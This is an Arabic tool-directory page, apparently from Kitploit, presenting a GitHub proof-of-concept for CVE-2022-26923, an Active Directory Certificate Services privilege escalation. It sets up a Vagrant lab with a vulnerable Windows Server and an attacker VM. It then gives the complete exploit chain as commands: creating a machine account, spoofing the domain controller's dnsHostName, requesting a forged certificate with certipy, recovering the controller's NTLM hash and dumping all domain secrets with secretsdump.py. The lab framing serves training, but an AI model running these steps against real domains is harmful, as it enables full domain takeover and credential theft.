Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-26923 — إثبات مفهوم لاستغلال CVE-2022-26923. | Kitploit
أدوات/GitHubGitHub/gh-badr/cve-2022-26923
تصعيد الامتيازاتالاستغلالاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubgh-badr/cve-2022-26923

CVE-2022-26923

إثبات مفهوم لاستغلال CVE-2022-26923.

عرض المستودع
221منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-26923

الوصف

هذه الثغرة سمحت لمستخدم بصلاحيات منخفضة بتصعيد صلاحياته إلى مسؤول المجال في بيئة Active Directory الافتراضية مع تثبيت دور خادم خدمات الشهادات في Active Directory (AD CS).

ترتبط بشكل أساسي بدور خدمات الشهادات في Active Directory (AD CS). دور AD CS هو دور خادم Windows يسمح لك ببناء بنية أساسية للمفاتيح العامة (PKI) وتوفير تشفير بالمفاتيح العامة وشهادات رقمية وتوقيعات رقمية لمؤسستك. يُستخدم دور AD CS لإصدار الشهادات للمستخدمين وأجهزة الكمبيوتر والخدمات.

جدول المحتويات

  • CVE-2022-26923
    • الوصف
    • جدول المحتويات
    • المتطلبات الأساسية
    • البيئة
    • الاستغلال
    • إثبات المفهوم
    • المراجع

المتطلبات الأساسية

  • Vagrant
  • VirtualBox

البيئة

إصدار Windows Server المستخدم هو Windows Server 2019 Standard Evaluation وهو الإصدار القابل للاستغلال. ملف Vagrantfile المرفق (في مجلد Vulnerable Machine) سيقوم بإنشاء جهاز افتراضي يعمل بنظام Windows Server 2019 مع تثبيت وتهيئة دور AD CS، بالإضافة إلى مستخدم بصلاحيات منخفضة بالبيانات التالية:

  • اسم المستخدم: user
  • كلمة المرور: V@grant1

لإنشاء البيئة، اتبع الخطوات التالية:

  • أولاً، استنسخ المستودع وانتقل إلى مجلد CVE-2022-26923:
    root@kitploit:~
    git clone https://github.com/Gh-Badr/CVE-2022-26923
    cd CVE-2022-26923
    
  • إذا كنت بحاجة إلى تغيير عنوان IP الافتراضي، يمكنك القيام بذلك في ملف Vagrantfile عن طريق استبدال عنوان IP في السطر التالي:
    root@kitploit:~
    config.vm.network "private_network", type: "static", ip: "192.168.33.13"
    
  • ثم قم بتشغيل الأمر التالي لإنشاء الجهاز الافتراضي:
    root@kitploit:~
    cd 'Vulnerable Machine'
    vagrant up
    
  • إذا لم يكن لديك جهاز Linux مثبت عليه certipy، يمكنك استخدام الجهاز الافتراضي المرفق في مجلد Attacker Machine عن طريق تشغيل الأمر التالي:
    root@kitploit:~
    cd 'Attacker Machine'
    vagrant up
    

المجلد Attacker Machine يحتوي على جهاز افتراضي مع سكربت شل سيؤدي إلى تثبيت أحدث إصدار من certipy. يمكنك أيضًا استخدام السكربت لتثبيت certipy على جهاز Linux الخاص بك.

الاستغلال

من أجل الاتصال بالجهاز المهاجم، قم بتشغيل الأمر التالي من مجلد Attacker Machine:

root@kitploit:~
vagrant ssh

الآن بعد أن أصبحت في الجهاز المهاجم، تحتاج إلى إضافة عنوان IP الخاص بخادم Windows إلى ملف hosts:

root@kitploit:~
echo "192.168.33.13   VAGRANT-K51B6U3.vagrant.local VAGRANT-K51B6U3 vagrant-VAGRANT-K51B6U3-CA vagrant.local" | sudo tee -a /etc/hosts

ملاحظة: إذا قمت بتغيير عنوان IP في ملف Vagrantfile الخاص بالجهاز القابل للاستغلال، يجب عليك تغييره هنا أيضًا.

ثم، لنقم بإنشاء حساب كمبيوتر جديد في المجال:

root@kitploit:~
addcomputer.py 'vagrant.local/user:V@grant1' -method LDAPS -computer-name 'CVEPC' -computer-pass 'P@ssw0rd'

للتحقق من إنشاء حساب الكمبيوتر، اتصل بالجهاز القابل للاستغلال باستخدام user وكلمة المرور V@grant1 عن طريق تشغيل الأمر التالي من مجلد Vulnerable Machine:

root@kitploit:~
vagrant ssh

ثم قم بتشغيل الأمر التالي للتحقق من إنشاء حساب الكمبيوتر:

root@kitploit:~
Get-ADComputer CVEPC -Properties dnsHostName,servicePrincipalName

حساب الجهاز هذا يحتوي على dnsHostName يساوي CVEPC.vagrant.local. ما نريده هو تغيير dnsHostName إلى VAGRANT-K51B6U3.vagrant.local وهو عنوان وحدة التحكم بالمجال.

للقيام بذلك، نحتاج أولاً إلى حذف اسم الخدمة الرئيسي (SPN) من حساب الكمبيوتر CVEPC عن طريق تشغيل الأمر التالي:

root@kitploit:~
Set-ADComputer CVEPC -Properties ServicePrincipalName @{}

ثم يمكننا تغيير dnsHostName إلى VAGRANT-K51B6U3.vagrant.local عن طريق تشغيل الأمر التالي:

root@kitploit:~
Set-ADComputer CVEPC -Properties dnsHostName VAGRANT-K51B6U3.vagrant.local
  • ملاحظة: لفهم سبب اضطرارنا إلى حذف SPN من حساب الكمبيوتر، يمكنك الرجوع إلى التقرير الخاص بالمشروع (بالفرنسية). أو يمكنك الاطلاع على المقال الأول في قسم المراجع الذي يحتوي على شرح مفصل من مؤلف الثغرة.

الآن بعد أن أصبح لدينا حساب كمبيوتر مع dnsHostName VAGRANT-K51B6U3.vagrant.local، يمكننا طلب شهادة خبيثة من الجهاز القابل للاستغلال عن طريق تشغيل الأمر التالي على الجهاز المهاجم:

root@kitploit:~
certipy req -username '[email protected]' -password 'P@sww0rd' -ca vagrant-VAGRANT-K51B6U3-CA -template Machine -target VAGRANT-K51B6U3.vagrant.local

يجب أن تحصل على شهادة باسم vagrant-k51b6u3.pfx في الدليل الحالي. للتحقق من أن الشهادة صالحة، استخدم أداة auth من certipy بتشغيل الأمر التالي:

root@kitploit:~
certipy auth -pfx vagrant-k51b6u3.pfx

إذا كانت الشهادة صالحة، يجب أن تحصل على تجزئة NTLM لوحدة التحكم بالمجال. والتي يمكن استخدامها بطرق خبيثة عديدة.

إثبات المفهوم

كدليل على المفهوم، يمكننا استخدام تجزئة NTLM لاسترجاع جميع الأسرار المخزنة في المجال (كما هو موضح في مقال مؤلف الثغرة). للقيام بذلك، يمكننا استخدام أداة secretsdump.py من حزمة impacket (المثبتة مع أحدث إصدار من certipy).

لاستخدام الأداة، قم بتشغيل الأمر التالي:

root@kitploit:~
secretsdump.py 'vagrant.local/[email protected]' -hashes :<NTLM hash>

استبدل <NTLM hash> بتجزئة NTLM التي حصلت عليها من الخطوة السابقة.

ونتيجة لذلك، يجب أن تحصل على جميع الأسرار المخزنة في المجال.

المراجع

  • Certifried: Active Directory Domain Privilege Escalation (CVE-2022-26923)
  • GitHub - LudovicPatho/CVE-2022-26923_AD-Certificate-Services
  • Try Hack Me - CVE-2022-26923
تنزيل الأداة